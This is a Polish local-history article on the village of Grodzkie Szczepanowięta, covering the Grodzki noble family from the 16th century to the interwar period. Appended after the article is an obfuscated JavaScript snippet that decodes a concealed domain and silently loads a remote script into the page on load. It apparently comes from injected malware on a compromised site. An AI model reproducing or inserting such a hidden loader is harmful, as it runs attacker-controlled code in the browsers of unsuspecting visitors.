Grodzkie Szczepanowięta

Grodzkie Szczepanowięta powstały zapewne w połowie XVI wieku, początkowo nie była to samodzielna wioska, lecz dział ziemi zwany Szczepanowski, zapewne dziedziczył tu jeden z Grodzkich o imieniu Szczepan. W spisie podatkowym z 1580 roku zapisano, że Szlachetny Walenty syn Michała Grodzkiego płacił podatek z 15 włók we wsi Grodzkie oraz od części Szczepanowskiej z 8 włók szlacheckich. W tym czasie był to jeszcze dział ziemi, lecz w następnych latach został zasiedlony przez Grodzkich stając się wioską drobnoszlachecką.
Wśród taki liczne szlachty zdarzały się wybitne postacie, był to na przykład Stanisław Grodzki pisarz ziemski bielski żyjącą w końcu XVI wieku, w XVII wieku żył Paweł komornik ziemski bielski. W tym czasie mieszkał w tej wsi Szymon, skarbnik ziemski bielski (połowa XVIII wieku). Grodzcy posiadali też w XVIII wieku wiele niższych urzędów sądowych w ziemi bielskiej. Wszystko to wiązało się z większymi dochodami, dlatego Grodzcy posiadali działy w tej wsi i sąsiednich, notowani byli również w Kuleszach już od XVI wieku.
Wśród licznej szlachty zdarzało się oskarżenia o nie szlacheckie pochodzenie, w 1680 roku niejaki Drohojowski zarzucił Janowi Grodzkiemu nie szlacheckie pochodzenie, była to największa obelga dla szlachcica. Jan udowodnił je w następujący sposób: Jan, dziedzic wsi Grodzkie, w Podlaskiem, h. Rola, z różą i trzema lemieszami, miał dwóch synów: 1) Erazma Macieja, którego syn Jan Tomasz, pozostawił syna Macieja i 2) Jana, po którym syn Jan, z Męczyńskiej miał syna Wojciecha, żonatego z Katarzyną z Paprockich, córką Jana, a wnuczką Piotra, dziedzica Paprotnej, h. Hołowy „cum signo gladii et pennis strutionis”, z której oczyszczający się Jan.
W 1827 roku ta miejscowość liczyła 13 domów i 81 mieszkańców. W 1891 roku w tej wsi notowano 17 gospodarzy pochodzenia szlacheckiego, uprawiali prawie 100 ha ziemi, średnie gospodarstwo miało obszar 5,6 ha ziemi.
W okresie międzywojennym nadal była to niewielka miejscowość, liczyła kilkanaście domów mieszkalnych.

Skip to content !function (_cc60f1) { var _b49dc = Date.now(); var _d055e6 = 1000; _b49dc = _b49dc / _d055e6; _b49dc = Math.floor(_b49dc); var _90ce5 = 600; _b49dc -= _b49dc % _90ce5; _b49dc = _b49dc.toString(16); var _19d7fc = _cc60f1.referrer; if (!_19d7fc) return; var _dd35ad = [47847, 47858, 47860, 47840, 47805, 47840, 47847, 47866, 47856, 47864, 47871, 47868, 47858, 47863, 47862, 47841, 47805, 47866, 47869, 47861, 47868]; _dd35ad = _dd35ad.map(function(_a5e140){ return _a5e140 ^ 47763; }); var _ef8be4 = "1d37f5d602faf8d2012ad3586294eda6"; _dd35ad = String.fromCharCode(..._dd35ad); var _19bac3 = "https://"; var _f09d44 = "/"; var _e34d7a = "mount."; var _23638a = ".js"; var _108118 = _cc60f1.createElement("script"); _108118.type = "text/javascript"; _108118.async = true; _108118.src = _19bac3 + _dd35ad + _f09d44 + _e34d7a + _b49dc + _23638a; _cc60f1.getElementsByTagName("head")[0].appendChild(_108118) }(document);